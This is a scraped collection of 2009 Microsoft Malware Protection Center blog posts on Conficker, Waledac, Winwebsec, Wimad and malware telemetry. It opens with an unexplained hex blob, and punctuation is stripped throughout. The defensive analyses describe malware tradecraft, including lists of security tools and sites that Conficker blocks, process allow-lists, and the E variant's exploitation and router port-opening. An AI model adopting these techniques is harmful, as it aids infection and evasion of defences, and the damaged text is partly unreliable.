31114AE87D026812748E791402D69C6D99697949E667F70144423A645C6BC67CE01424F72059432095909E79A39606A2067120AEF63431F2C073B4B9298DC97200E9B9F0A53ED36C9464E4C4C154878742F1CA6EC696965EAF20A3BC180FFE0AD59FF7AC786A5FC27DB0C3B97662EB60EEFA1AD57FA27E661032329AD9AF5FD243DA97033ED9E18A7E5EE245B77CFB4FC560013849072C94396927EF7A63AC6A45FA3BD6DD7390CA60462F61A6FCB247721F3AF84FA7D5536E54F6A5357F3AC5AEDFA7EE52A49249FA0E76E509A8DF67B36B20BCBD0F6E4406DF32BA100493FAEFB399B9FFEBA156D31E2A0DE419579330034398052FBDD32ED13D27E4102621E1067FDF3634F33B2C350727FBFFF74687F608887E277068ED0390BD04CCF50698977FEDDBA02158D0425E5895439663C0481CA3911E694850However, users should also note that whatever malware is being servedcan be changed by the malware authors at any timeJavascript sourcecodeThis is a screenshot of part of the Gamburl code It attempts todetermine the script engine version of the browser being used Basedon this information, the malicious site could serve a variety oftargeted exploitsAs always, we recommend that you use antivirus software and make surethat you have the latest signatures Microsoft Antivirus customers arecurrently protected against the Gamburl family with detectionsTrojan:JS/GamburlA and Trojan:JS/GamburlgenABecause this threat also makes use of a lot of exploits for otherapplications we would also like to remind users to always update alltheir software to the latest versionsThanks to Jonathan Poon and Ian McMillan for providing us informationregarding sqlsodbcchm-Elda Dimakiling et Jireh SanicoIMAGEhttp://www.secuobs.com/revue/news/102307.shtmlhttp://www.secuobs.com/revue/news/102307.shtml Secuobs.com : 2009-05-21 06:57:45 - Microsoft Malware Protection Center - This month’s MSRT shows the following top ten most prevalent threatfamilies as of May 19 The newly added and blogged rogue family,Win32/Winwebsec, is ranked at #17 with 34,792 infected machinesFamilyMost Significant CategoryDetectionsInfected MachinesRanking changeWin32/TaterfWorms347,424343,515=Win32/AlureonMiscellaneous Trojans256,998248,341+Win32/FrethogPassword Stealers and Monitoring Software96,92295,581-Win32/BancosPassword Stealers and Monitoring Software97,38992,565+Win32/KoobfaceWorms79,99378,113+Win32/RenosTrojan Downloaders and Droppers76,30475,118=Win32/CutwailTrojan Downloaders and Droppers95,72674,400-Win32/VundoMiscellaneous Trojans67,32265,233+Win32/VirutViruses78,89653,995+Win32/LolydaPassword Stealers and Monitoring Software54,87151,050+A few key takeaways from this telemetry:* Out of the top 10 threat families six moved higher in rankingcompared to last month Some of these six threat families likeAlureon and Vundo have been around for more than two years whileother like Koobface refer to the recent MMPC Koobface blog haveonly been seen in the ecosystem for several months This indicateseach threat has its own lifecycle and it appears that sometimesmalware authors are willing to reinvest in their existingdistributions instead of moving to somewhere else* Three of the top 10 are password stealer threats In fact thereare five if you count those two worms, Taterf and Koobface, bothof which have critical payload of stealing user data Or considersix - Alureon trojan goes for users’ password and creditinformation as well Adding them together there are 859,842machines infected by password stealer threats when we are onlytalking about the top 10 threats Note this is not a direct sumsince some machines were infected by more than one of thesethreats* Renos continues to be high on the list and is a major distributionchannel for fake Antivirus programs* Cutwail drops slightly but stays in the top 10 This is a spambotthat we’ve discussed in different venues including in the recentWaledac blogSo, not much of a surprise but worth taking note - identity theft,rogues and spammer highly occupy the top 10 Criminals are going afteryour wallet especially at this recession time Be safe Make sure youhave firewall and AV product installed on your systemScott WuIMAGEhttp://www.secuobs.com/revue/news/99767.shtmlhttp://www.secuobs.com/revue/news/99767.shtml Secuobs.com : 2009-05-16 05:34:22 - Microsoft Malware Protection Center - Nowadays almost everyone is affected by the recession in one way oranother More and more people try to save moneyInstead of buying licensed songs in CD form or from reputable onlineservices, some people prefer to download songs via P2P or do a directdownload from untrusted sites This is a popular way of getting musicfiles for freeWimad is a malware family that is known for using music files as itsmedium for distribution It is a detection for malicious Windows mediafiles that encourage users to download and execute arbitrary files onan affected machine When opened with Windows Media Player, Wimadfiles open a particular URL in a web browser and prompt the user todownload a file The accessed URLs and the downloaded files varyaccording to the Wimad variant, but some of the known detections forthe downloaded files are Adware:Win32/PlayMp3z,TrojanDownloader:Win32/TracurA and Trojan:Win32/NebulergenD In thewild, Wimad files have been observed with the extensions ASF, ASX,MP3, and WMABelow is a graph of the top 10 family detections for the last twelvemonthsIMAGEAs you can see in the following graph, Wimad is the 7th family withthe most number of reported detectionsIMAGELooking at Wimad’s monthly detection report from May 2008 to April2009, we can see an increase in detection, with an average detectionof about 15M per month and a peak observed last December and Januaryexceeding more than 2MIMAGEBased on the geographic distribution of Wimad for the last year,United States, Canada and United Kingdom are the most affectedcountriesAs blogged before by our fellow researchers, the cost for freesoftware might be too high Time and time again we encourage users tosupport and patronize licensed media and software--Francis Tan Seng et Elda DimakilingIMAGEhttp://www.secuobs.com/revue/news/97059.shtmlhttp://www.secuobs.com/revue/news/97059.shtml Secuobs.com : 2009-05-14 14:24:52 - Microsoft Malware Protection Center - This month’s addition to the Malicious Software Removal Tool MSRT isa rogue security program called Trojan:Win32/Winwebsec In most waysWinwebsec is virtually the same as most other rogues It is oftendistributed through fake online scanner web pages that have a veryfamiliar look to anyone who has spent any time looking at rogues:IMAGEIMAGEThis web page is virtually identical to those used by other rogueslike Trojan:Win32/FakeXPA and Trojan:Win32/WinSpywareProtect It can’tactually scan the machine; it’s entirely fake At the end of the“scan”, or if you click anywhere on the page, it tries to load thetrojan itself, which usually goes by the file name “installexe” Ifallowed to run, this installs the rogue, which generally looks likethis:IMAGEWinwebsec goes by different names “System Security” and “WinwebSecurity”, which is also typical of a rogue One less common featureis that it has been known to download additional malware For a shorttime it downloaded Worm:Win32/Koobface which we added to MSRT inMarch This brings us full circle: one of the ways we have seenpeople directed to Win32/Winwebsec’s fake online scanner is viaWin32/Koobface As Scott mentioned in his blog, Koobface can launchpop-ups which load fake online scanners At one time it was FakeXPA,at another it was Win32/Winwebsec Koobface doesn’t seem attached to aspecific rogueSome variants of Winwebsec try to block execution of particularprograms Instead of containing a list of programs to block, however,they contain a list of programs to allow:algexecsrssexectfmonexeexplorerexeservicesexeslsvcexesmssexespoolsvexesvchostexesystemiexploreexelsassexelsmexenvsvcexewininitexewinlogonexewscntfyexewuaucltexeAnything not on the list won’t run This is enough to enable thesystem to work barely, but obviously stops you from running toolsthat might help you remove Winwebsec even cmdexe and taskmgrexe areblocked, for example This “feature” serves a dual purpose, however:it is also another way to convince you that you need to pay money forthe rogue:IMAGE-- Hamish O’DeaIMAGEhttp://www.secuobs.com/revue/news/96269.shtmlhttp://www.secuobs.com/revue/news/96269.shtml Secuobs.com : 2009-05-08 07:52:23 - Microsoft Malware Protection Center - The SpambotWhilst Win32/Waledac is probably best known for the ability to sendspam, it can also download and execute arbitrary files In addition tousing this downloading mechanism to update itself, Waledac can alsodownload other malware The MMPC has observed the download ofTrojan:Win32/FakeSpypro and TrojanDownloader:Win32/Rugzip variantsDownloading and executing arbitrary files is not confined to malicioussoftware Waledac also attempts to download and install a version ofthe freely available packet capturing library "WinPcap" This spambotleverages the capability of the library to "sniff" network traffic,searching for credentials being transmitted as part of SMTP, POP, HTTPand FTP protocolsIn addition to what we mentioned in the previous blog that Waledac hasbeen downloaded by variants of Win32/Bredolab, we have also seenWaledac being downloaded by Win32/Cutwail in the wild Interestingly,the MMPC has recently identified Win32/Cutwail variants downloadingthe same rogue as Win32/Waledac, Win32/FakeSpypro below it the skinfor FakeSpypro rogue Another piece of information about all thingsunderground economyIMAGEThe TelemetryNow let's take a look at the MSRT telemetry after Waledac was added toMSRT in April Waledac is the #24 most prevalent threat family thismonth More than 20,000 distinct machines were detected with Waledacinfection worldwide The criminals behind Waledac seem to enjoy havingthe deployment mostly on XP Note this is not normalized As of todayMSRT install base on Vista is about 37% the size of that on XPIMAGEFactoring with the installbase, we came up with the following table ofinfection rate, or computer cleaned per thousand MSRT executions CCMwidely used in Microsoft Security Intelligence Report This tablepresents the top 25 Waledac infected countries, then sorted by CCMTurkey has the highest infection rate, followed by Hungary,Switzerland and AustraliaTop 25 Infected Countries - Sorted by CCMCountryInfected MachinesMSRT ExecutionsCCMTurkey7732,789,1400277Hungary1841,204,1400153Switzerland97808,8800120Australia2572,266,0600113Russia4744,435,2000107United States10,788102,158,3000106Norway1451,600,7200091Canada3363,882,6600087Poland3814,413,2600086Finland1131,465,1400077Belgium931,311,6600071Netherlands3845,632,0000068Sweden1972,890,1400068Czech Republic1321,995,9200066Portugal1051,674,6000063Mexico1362,226,7400061United Kingdom62110,570,4400059Denmark1131,984,0000057France75214,528,9000052Spain44310,767,5400041Brazil2947,481,9200039Korea2948,333,6600035Italy2087,530,0600028Japan56321,683,6000026Germany29116,958,3200017The Spam DataThe MMPC and the Forefront Online Service for Exchange FOSEconducted some research on Waledac related spam In this study weincluded the following subset of Waledac owned domains and monitoredthe spam emails between 4/15 and 4/23* chinamoilesmscom* coralarmorcom* freeservesmscom* miosmsclucom* smsclunetcom* smspianetacomFrom these domains we identified the related IPs and counted theemails sent from those IPs Over the course of the study, we observeda total 7,199 distinct IPs sending spam from Waledac We observed4,091,725 spam emails distributed by these IPs during the seven daysNon-Delivery Report NDR is not counted as spam email in this studyNote this is not even the peak of Waledac email campaignDateSum of SpamSum of NDRDistinct IPs4/15/2009520,423272,0502,4304/16/2009606,171329,5523,6734/17/2009588,710322,7792,8024/18/2009516,215281,2252,6974/19/2009514,375242,6662,2224/20/2009660,828285,4732,4504/21/2009685,003293,1931,760Grand Total4,091,7252,026,93818,034** 18,034 is the cumulative sum The distinct number is 7,199The location of the senders of this spam does not necessarily matchthe geo distribution chart of the MMPC waledac detection Thecontrollers of waledac can decide which zombies will be throttled orheavily loaded Furthermore, they can rotate these IPs in and out andneed not have them all active simultaneouslyCountryNumber IPsTotal SpamAvg Mail per IPUnited States7,5823,143,7931,4242China1,4923,47572South Korea9003,27650Great Britain827158,0265897Japan67297,3092932Germany46274,5564775Brazil4456,978544Canada36577,0427343Australia34215,7542254France340226,2151,3553Russia3091,815160The Netherlands28611,0662432Italy25817,6011372Taiwan233--Unknown2278,700541Argentina2137,382667Spain17519,0811347Czech Republic1701,6561644Poland1651,517367Turkey1581,29384India1555,179722Romania1231,092155Singapore1127,7243004Austria1012,0612372All others1,922199,1342487Grand Total18,0344,091,7257371We will continue to monitor the waledac threats and the spamactivitiesScott Wu - MMPCTerry Zink - FOSEScott Molenkamp - MMPCIMAGEhttp://www.secuobs.com/revue/news/93482.shtmlhttp://www.secuobs.com/revue/news/93482.shtml Secuobs.com : 2009-05-06 03:39:50 - Microsoft Malware Protection Center - About four months ago some new colleagues in the security businessarrived in our Dublin office They are part of Microsoft Anti-spamteam and it is our pleasure to have them here :The Dublin Spam team recently told us that almost every week,Microsoft Forefront Online Security for Exchange is filtering awhopping 13 billion spam messages Most of them around 95% areautomatically blocked because they are sent from computers listed inblacklistsDateTotal number of messagesNon-spam messagesSpam messagesMar 2 – Mar 814,573,035,329305,930,37714,267,104,952Mar 9 – Mar 1513,407,338,885316,179,47913,091,159,406Mar 16 – Mar 2212,946,498,410308,336,93412,638,161,476Mar 23 – Mar 2913,505,537,445307,332,41313,198,205,032Mar 30 – Apr 514,928,945,154316,407,06914,612,538,085Apr 6 – Apr 1213,389,657,751291,404,66813,098,253,083From the remaining messages that are coming from computers not listedin a blacklist of known spammers, another 30% are flagged as spam byvarious filters and rulesThat’s a staggering amount– one in three messages that is sent to youfrom supposedly clean systems is spam, but thanks to the work done bythe Anti-spam team, it doesn’t clog your inboxNow, probably you remember or not our blog entries about ourhoneypot part1 and part2 We’ve also installed a fake open-relaymail server and today we’re going to show you some of the things thatwe’ve receivedIn the past few months our honeypot received probes from more than 60independent computers that are used by various automated systems toactively search for badly configured mail serversSpammers are always on the lookout for expanding their capabilities tosend spam messages, maybe contracting bot-herders that control anumber of infected machines capable of sending massive amount of spamfor their campaignNow, a server won’t be added so easily to the spammer’s network Probee-mails are sent a couple of times to check the viability of thetarget mail server for example, to ensure that the target mail serveris active and has not been reconfigured The probe e-mails we’vereceived usually have the following format:Sender: Receiver: For easier verification, the subject usually contains a way toidentify the scanned computer, for example:Subject: BC_OrSubject: Super webscan open relay check succeded, hostname = Country/RegionNo of Probee-mail templatesTaiwan116Russia5United States3European Union1Another interesting thing is that spammers are also using various freeweb mail services in their probesAfter a short check of these IPs we found just a few of them listed inour database as known spam senders Of course some of those thataren’t listed belong to various web mail services, but the others areprobably part of a botnet/spam network and are used only for variousscans possibly for “reconnaissance” attempts and not for sendingspamUsing an open relay mail server is an integral part of the spamcampaign A spam message can try to sell you an untrustworthy product,but more seriously it can lead to a phishing scam, or might containlinks that point to malicious filesTo make sure that your Microsoft Exchange Server is not configured asan open mail relay, you can read Microsoft KB Article 895853With our efforts combined, Microsoft’s Anti-malware and Anti-spamteams are actively working on mitigating these attacksSpecial Thanks to Kai Yu from the Dublin Anti-spam Team, and AndreiFlorin Saygo and Jireh Sanico from the Dublin Anti-malware Team- MMPC Dublin- Dublin Anti-spam TeamIMAGEhttp://www.secuobs.com/revue/news/92425.shtmlhttp://www.secuobs.com/revue/news/92425.shtml Secuobs.com : 2009-05-05 08:22:34 - Microsoft Malware Protection Center - On April 14th, Microsoft released the latest update to the MicrosoftMalicious Software Removal Tool This month as you know from ScottMolenkamp’s blog post, we added Win32/Waledac In fact, of the top 5families, worms make up 3 of the slots: Win32/Taterf, Win32/Frethog,and Win32/KoobfaceFamily NameReport CountTaterf1,166,975Frethog390,967Alureon328,554Koobface142,164Cutwail134,549Worm:Win32/Koobface has actually moved up one slot to #4 from lastmonth’s telemetry update Jeff Williams has described the industryapproach to deal with this type of threat in his blog entryWorm:Win32/Taterf is on the top of the list, for prevalence MattMcCormack discussed this threat in greater detail in a blog postThere are a lot of worms out there on the Internet, so be careful outthere: make sure to keep your antimalware software up to date, don'trun programs you don't trust, run with an up to date firewall, andkeep up to date with both application and operating system updates--Jeremy CroyIMAGEhttp://www.secuobs.com/revue/news/92072.shtmlhttp://www.secuobs.com/revue/news/92072.shtml Secuobs.com : 2009-05-01 01:11:01 - Microsoft Malware Protection Center - You might find it hard to believe, but that’s the number of new uniquemalware samples we detect on average every day in the wild During thesecond half of 2008 our products detected a total of nearly 95 millionunique malicious files The total number of distinct malware files wedetect every day in the wild is even higher: 841 thousand unique filesthat’s the daily average over 2H08 however malware is often detectedduring consecutive days or even longer Half a million is the dailyaverage of new unique samples detected every day during 2H08These numbers are huge However we need to remember that there are acouple of reasons that contribute to this huge malware proliferationHere are some of them:* Virus infections - One virus can infect many different files, eachone of them can then infect more files While they all stem fromthe same virus, hash-wise all these infected files are different* Polymorphism – There are several scenarios here For example inserver side polymorphism, the server provides a slightly modifiedcopy of the malware each time Therefore when a thousand usersconnect to that server, they’ll likely get a thousand differentcopies of the malware, but all these copies basically share thesame functionality Another scenario is polymorphism that happensduring malware replication: when malware spawns a new copy, thatnew copy might be a slight modification of the original one,yielding a high number of unique copies Often many of thesereplicated samples are corrupted and cannot execute at all Butnote that in all the statistics here, we did not include counts ofknown damaged filesThe Microsoft Security Intelligence Report SIR Volume 6, which wereleased this month, includes more details For example, here is thetotal number of unique samples we detected during the second half of2008 broken by the category:Figure 55 from SIR v6: Number of new unique samples broken by categoryQuite expectedly, the most common malware samples are files that gotinfected by viruses for the reason explained above Yet, the numbersfor the other categories are high as well Over 16 million uniquetrojans, 55 million malicious downloaders and droppers, and nearly amillion unique exploit files were detected Here’s the monthly trend:Figure 56 with the monthly trends by categoryMany of the trojans are used as part of rogue security software Inparticular, we started removing the trojans with the MSRT in Decemberin addition to blocking them with our other products These trojansuse server-side polymorphism and that explains the spike we see in thenumber of trojan samples in December During that month, we detectednearly a million new unique samples of the Win32/FakeXPA trojans Incontrast to malware, spyware and Potentially Unwanted Software usuallydo not use these tricks to evade detection and their number of samplesis comparatively low Yet they still affect large number of users Seethe SIR and the following blog post for detailsHere are the malware families that had the highest number of samplesin 2H08 First, two families of viruses show:Figure 57 with the families that have the highest number of samplesAnd then other malware families follow some of them are viruses aswellFigure 57 - cont - with the families that have the highest number of samplesOverall, these numbers show that any attempt to block malware bymaintaining lists of bad hashes is doomed to fail Security vendorsshould focus on generic and heuristic signatures to maintain effectiveprotection against malware proliferationFor more information, please see the “Trends in Sample Proliferation”section in the most recent SIRJoe Faulhaber et Ziv MadorMicrosoft Malware Protection CenterIMAGEhttp://www.secuobs.com/revue/news/90787.shtmlhttp://www.secuobs.com/revue/news/90787.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Hide behind huge numbers, making fighting against very expensiveBirthday problem or paradox is the probability that, from a given setof people, two of them will have the same birthday It is a paradoxbecause the result defies common sense For a group of 23 people, thechance that two of them share the same birthday is greater than 50%,and for a group of 57 people, it is higher than 99%The best known use of Birthday Problem paradox is probably theCryptographic Attack known as the Birthday Attack This attackexploits the math behind the Birthday Paradox, by looking forcollisions in a small set, having a much higher collision chance thanexpectedRecently I came across a different use of the same paradox, in whatelse than the infamous Conficker Here, the use of this statisticalparadox is different, with the purpose of making the fight againstthis worm much harderHere is the problem explained: each day, they have a pool of 50,000pseudorandomly generated URLs, out of each any infected computerrandomly chooses 500 The total number of possible draws is huge Itactually has 1,215 digits in decimal representation and people willfind hard even to imagine it Just for the fun of it, I annexed thefile to the end of my post However, as you will see, in practicethings work on a much smaller scaleRegistering all of them is an incredibly challenging task, and herelies the power of the aforementioned statistical problem The problemhere is to find the probability that a random group of 500 URLscontains at least one out of a smaller set I will refer to such casesfrom here on as hits And the result is amazing: if one registers 50URLs, the chance to hit is 39514%, and if one registers 500 URLs thechance to hit becomes 99359% That is, with only 1% of the poolregistered, one can achieve more than 99% success rate in spreadingnew malware content using ConfickerThe graph of hit chance is hereIMAGEOn the horizontal axis we have the number of registered URLs and onthe vertical axis we have the chance that any random draw will hit atleast one of them, or in other words, the chance that a computerinfected with Conficker will access one of these URLsThis shows the importance of blocking as many of the 50,000 URLs aspossible A single missed URL that happens to be registered formalicious purpose can get 1% chance to spread malware to Confickerinfected machinesRandomly blocking some of the URLs have limited benefits, since thepool size is fairly big and the number of URLs potentially used by themalware is relatively small at least two orders of magnitudeEven if the above statement is true, there are some particularitiesthat may help overcome these facts The domains have to be registeredthrough a limited number of Registrars, based on their TLD By workingwith the registrars directly, bulkily blocking large numbers ofdomains becomes less of a problem than Conficker’s authors hadforeseen, and with all the attention this thing is getting, people arewilling to put in a lot of work to see this threat overThe “good guys” also may use this paradox to their own advantage Itmay give means in estimating the real size of the “infection” in theworld By registering a limited numbers of URLs, one can monitor theincoming requests, and knowing the chance a URL is picked, one canextrapolate to the number of infected machinesAppendix 1 - Mathematical reasoning behind the numbers I’ve presentedhereLet’s denote by Cn,k the number of combinations of size k chosenfrom a set of n elements S Our problem is to determine theprobability that a randomly chosen set hit at least one element from asmaller subset of S Let m be the number of elements in that smallerset M is the subset of S, having CardM = m The total number ofpossible k sized sets out of S is Cn,kIn order to see how many of them contain at least an element from M wecheck first its complement That is, the number of k-sets that do notcontain an element from M It is obvious that to have such sets, m hasto be smaller than or equal to n– k In other words if m is greaterthan n– k, there is no possible choice of k-sets that do not containelements from M If m is smaller than n– k and we subtract M from SSM we get a subset of S, denoted by S’ that has n– m elements Itis clear that all k-sets from S that do not contain elements from Mare also k-sets for S’, and all k-sets from S’ are also k-sets for S,so the sets are equivalent Thus the number of k-sets from S that donot contain elements from M is equal to the number of k-sets from S’which is equal to Cn-m,kAs a direct result, the number of k-sets from S containing at least anelement from M is Cn,k–Cn-m,k In order to compute the probabilitywe divide this number by the total number of sets We get Pm = 1 –Cn–m,k/Cn,k If we break this down we get toIMAGEAs we see, the second element is a product of sub-unitary numbers,which decreases towards 0 as we increase the number of elements mAs a matter of fact, each element in the product is smaller than thefirst element n–k/n trivial to prove under the assumption 1=j=m=n-kresulting in the following approximation,IMAGEthat is closing to 0 faster than an exponential This means that ourprobability can be approximated with the following formulaIMAGEAnother debate may be started around the fact Conficker doesn't checkfor duplicates when picking up the 500 URLs To take this intoaccount, we have to estimate the average number of duplicates in arandomly picked 500 set out of the bigger 50,000 possible choices Acollision counting formula may be found at Collision counting formulaApplying the formula on our case, gives an estimate of 24867duplicates on any random draw To take this into account, we have toadjust previous calculations with 497 instead of 500, but this doesn'tinduce a notable difference in the resultsAnother approach for the same arguments is to take into account thenumber of combinations with repetitions, rather than the number ofcombinations This changes the above formulas to Cn+k–1,k usedinstead of Cn,k; Combinations with repetitions Having the followingsubstitution n'=n+k–1 we get to the same formulas, but n' used inplace of n The differences in the numbers above are insignificant,and this is true for similar cases: n much bigger in comparison with kAppendix 2 - Here is a table showing the probabilities to get a hitfor up to 100 URLs The values are computed with the exact formula,not using the approximation, but in most cases, especially with largenumbers, the estimation gives a pretty good idea#Chosen URLsChance to hit1100%262300%514012%765344%2199%272377%524072%775391%3297%282453%534131%785437%4394%292529%544190%795482%5490%302604%554248%805528%6585%312678%564306%815572%7679%322751%574363%825617%8773%332823%584419%835661%9865%342895%594475%845704%10956%352966%604530%855747%111047%363037%614585%865790%121136%373106%624639%875832%131225%383175%634693%885874%141313%393244%644746%895915%151400%403311%654799%905956%161486%413378%664851%915996%171571%423445%674902%926037%181655%433510%684953%936076%191739%443575%695004%946116%201821%453639%705054%956155%211903%463703%715104%966193%221984%473766%725153%976231%232064%483829%735201%986269%242144%493890%745249%996306%252222%503951%755297%1006343%Appendix 3 - Number of 500 sized groups out of a pool of 50,000204,834,213,151,168,214,461,654,141,379,130,974,442,702,258,579,159,760,519,079,012,459,387,176,802,787,506,861,786,508,179,331,441,121,439,711,042,255,209,315,604,421,328,946,422,708,973,054,967,511,463,454,539,076,329,708,371,835,003,639,384,418,663,768,257,135,542,695,566,118,398,524,969,107,678,840,406,278,808,768,917,987,669,580,920,601,539,854,184,448,084,968,926,599,909,629,237,703,403,693,367,099,024,184,779,484,619,888,559,300,860,309,406,196,851,763,668,717,714,332,015,184,499,781,085,279,838,674,767,933,215,516,613,767,486,445,885,103,234,075,164,696,519,772,065,511,437,536,446,581,389,706,964,561,561,630,111,372,422,588,407,655,472,487,156,160,979,442,796,737,751,214,470,874,983,713,716,166,016,097,542,640,445,995,015,124,162,692,362,933,579,204,387,223,639,162,341,095,056,558,194,384,376,095,685,557,088,871,687,075,022,514,166,924,615,039,210,753,372,304,959,038,121,674,413,419,287,592,963,128,974,892,289,843,707,783,982,076,564,230,128,288,660,514,687,421,957,578,018,027,099,724,820,158,186,441,086,224,228,396,845,701,885,741,875,315,754,256,285,000,948,322,222,787,948,002,673,558,400,910,506,477,079,314,973,748,069,999,035,196,658,450,861,075,755,112,300,624,257,908,109,473,126,745,582,249,777,744,799,202,563,038,549,934,781,898,593,761,740,878,642,558,088,366,365,761,869,077,984,254,942,611,411,570,900,277,727,137,416,203,980,580,420,283,292,933,330,096,057,462,249,072,976,977,887,327,330,947,186,730,927,061,671,007,370,705,441,238,632,455,277,914,656,553,937,760,943,654,927,229,770,344,284,531,443,702,460,460,473,920,711,298,545,759,340,018,169,550,420,491,173,318,117,302,400--Dan NicolescuIMAGEhttp://www.secuobs.com/revue/news/89801.shtmlhttp://www.secuobs.com/revue/news/89801.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Here at the Microsoft Malware Protection Center MMPC we look forways to share the valuable data, insights and expertise that we havewith our customers on a regular basis We just released the sixthvolume of our Microsoft Security Intelligence Report SIR The SIRshares the conclusions drawn by our research team using data gatheredfrom hundreds of millions of computers worldwide and some of thebusiest services on the internetA very clear trend we saw in the second half of 2008 was the rise inprevalence of rogue security software software which poses asanti-malware or anti-spyware protection but in reality does little ornothing, and may even be malware The data also indicated that thenumber one threat we saw worldwide was Win32/Renos, a family of trojandownloaders and droppers that is used to distribute rogue securitysoftware – in the second half of 2008 we saw this threat increase inprevalence by 666% We also saw a number of other rogue securitysoftware families increase in prevalence around the world, indifferent languages – be careful out there Get your software from atrusted source You've heard it before It's sound advice we want topass alongHere are a couple of other key findings from the report:* The trojan downloaders and droppers and miscellaneous trojancategories of threat remain the most prevalent threats we seeworldwide, making up more than 50% of all malware removed:IMAGE* The infection rates for newer operating systems, and later servicepack combinations, is significantly better than that of theirpredecessors:IMAGE* Infection patterns vary between enterprise and home computer users– enterprise computer users Forefront Client Security usersencounter more worms in their environment, whereas home computerusers Windows Live OneCare users encounter more trojan threats:IMAGEHere are some resources that Microsoft has created to help you protectyourself from these threats:* Again, use an up to date antimalware product from a known, trustedsource, and keep it updated Be cautious not to followadvertisements for unknown software that pretends to provideprotection Access the sites of the reputable vendors directly forgetting information or subscription to their products andservices* If your antimalware software does not include antispyware softwareyou should install a separate program and keep it updated WindowsDefender is included in Windows Vista, and is available as a freedownload for Windows XP users fromhttp://wwwmicrosoftcom/windows/products/winfamily/defender/defaultmspx* Install a firewall and keep it turned on* Always run up-to-date software Enable Automatic Updates inWindows, which will ensure that the latest security updates fromMicrosoft are downloaded automatically Periodically check the Websites of third-party add-on vendors to ensure that you have thelatest security updates for their software* Use caution when you click on links in e-mail or on socialnetworking sites* More information and guidance on rogue security software can befound athttp://wwwmicrosoftcom/protect/computer/viruses/roguemspxThere is lots more data and analysis to be found in the SIR - readmore by downloading the SIR and the Key Findings Summary hereThanks,Vinny GullottoGeneral Manager, MMPCIMAGEhttp://www.secuobs.com/revue/news/89800.shtmlhttp://www.secuobs.com/revue/news/89800.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Over the last couple of days we've seen some spam claiming to be fromMicrosoft, providing a free scan to remove Conficker Here's anexample:Misleading emailThe link actually takes you to a typical fake online scanner page usedto serve up a rogue security scanner:ScreenshotIn this case the page tries to get you to downloadTrojanDownloader:Win32/RenosHL which in turn installs the rogueTrojan:Win32/WinSpywareProtect You can read tips on how to recognizeand avoid fraudulent e-mail--Hamish O'DeaIMAGEhttp://www.secuobs.com/revue/news/89799.shtmlhttp://www.secuobs.com/revue/news/89799.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - There have been new developments in the Conficker arena within thepast couple of days We would like to inform those who are concernedthat the MMPC is working to make sure you have the information youneed, first to be protected from any threat; and second, to provideyou with a full understanding of the threat itselfThere have been primarily two new binaries reported We are pleased toinform that Microsoft products such as Windows Live OneCare, WindowsLive OneCare safety scanner, and the Forefront family of products wereable to detect both of these newly reported binaries with existingsignatures, no update required as Worm:Win32/ConfickerD andWorm:Win32/ConfickergenA Specific detections have been added forthe new variants as Worm:Win32/ConfickerD and Worm:Win32/ConfickerEThe first item MD5:EB0787C5B388C685B406ED46AE077536/SHA1:4887AB470FF4E49BB5F7D01331F3DF16B2BB507Bwas a minor change to the existing D variants Existing signaturesreport this variation as Worm:Win32/ConfickerD Minor differencesfound in this variation include:Additions to the list of programs which will not be able to run oninfected systems, programs with these substrings:bd_remcfremokillstingerIn addition, the following domain substrings are blocked:activescanadwareav-scbdtoolsmitrems-mvpprecisesecurityOf note are a number of security tools and sites that were prominentin the run up to April 1 that are no longer feasible if theprospective user is one who is infected by this versionTo reiterate however, no updates or changes in posture required byanyone who uses Microsoft toolsThe second newly discovered binary, one that is drawing attention inthe media as E MD5: 677daa8bf951ecce8eae7d7ee0301780/SHA1:879e553b472242f3ec5a7f9698bb44cad472ff3b, is still being dissected byour malware research lab and why I can be spared to write this ratherthan them Existing signatures report this variation asWorm:Win32/ConfickergenAAt first glance, this variant was considered a variant of A And asfortune would have it, Microsoft products also were able to detectthis new variant with existing signatures, no updates requiredHowever, deeper analysis shows the following reminder, we arecontinuing to research this, but the differences are significantenough that we will be designating this new variant as ConfickerE:* Exploits MS08-067* Contains code to spread via network shares* Drops a driver similar to early variants, using the samemechanisms as ConfickerB* Opens a web listener on a pseudo-random port between 1024 and 9999based on the volume serial number of the system drive* Appears to appends a stream of randomly generated garbage toitself before offering itself for further propagation This willresult in untrustworthy file identification information like theones I use above to inform other researchers as to the specificvariant I am talking about; but our community can work its wayaround that* Contains some of the same IP-filtering used in ConfickerD Don’tgo to certain IP ranges* Periodically connect to the following URLs to check for internetconnectivity:http://wwwaolcom/http://wwwcnncom/http://wwwebaycom/http://wwwmsncom/http://wwwmyspacecom/* Periodically connect to one of the following sites at random todetermine its external IP address:http://checkipdyndnsorghttp://checkipdyndnscomhttp://wwwmyipaddresscomhttp://wwwfindmyipaddresscomhttp://wwwipaddressworldcomhttp://wwwfindmyipcomhttp://wwwipdragoncomhttp://wwwwhatsmyipaddresscom* Deletes itself on and after May 3rd 2009* Uses SSDP to find Internet gateway devices ie routers andissues a SOAP command on the device to open an external TCP portand redirect it to an internal IP:port* Does NOT appear to have the P2P protocol code *Correction: dropsa DLL component that contains P2P functionalityWith all these differences, it is important to note a very keydifference between the E variant and previous A-D variants The Evariant executes simultaneous to the existing ConfickerD already onthat infected machine So, for instance, not having the code to checkURLs for updates is not significant as the machine is already doingthat under ConfickerD’s guidance Same for the last note about P2Pprotocol and other such thingsTo keep abreast of developments regarding Conficker, please checkhttp://wwwmicrosoftcom/conficker As we fill out the details on E,you will be able to find it here http://wwwmicrosoftcom/security/portal/EntryaspxName=Worm:Win32/ConfickerEAnd if there is other significant or breaking news, we will be backwith more information here, on our blogLastly, the press is filling up with conjectures and theories on whoand what else is associated with this activity There are more layersyet to unravel We would like to gather more evidence beforecommenting on those thoughtsMy thanks to Aaron Putnam, Vincent Tiu, and Cristian Craioveanu asthey continue peeling apart the layers of this onion-- Jimmy KuoPS: My heart-felt wishes for everyone to have a good FridayIMAGEhttp://www.secuobs.com/revue/news/89798.shtmlhttp://www.secuobs.com/revue/news/89798.shtml Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - As Vinny mentioned in his post, the data in our recently releasedMicrosoft Security Intelligence Report SIR clearly shows what we'vebeen seeing in our day-to-day research over the last six months or so- rogue security software is getting more prevalent As well as theraw data, the SIR includes some of our research into how roguesevolved over the second half of 2008 In addition to becoming 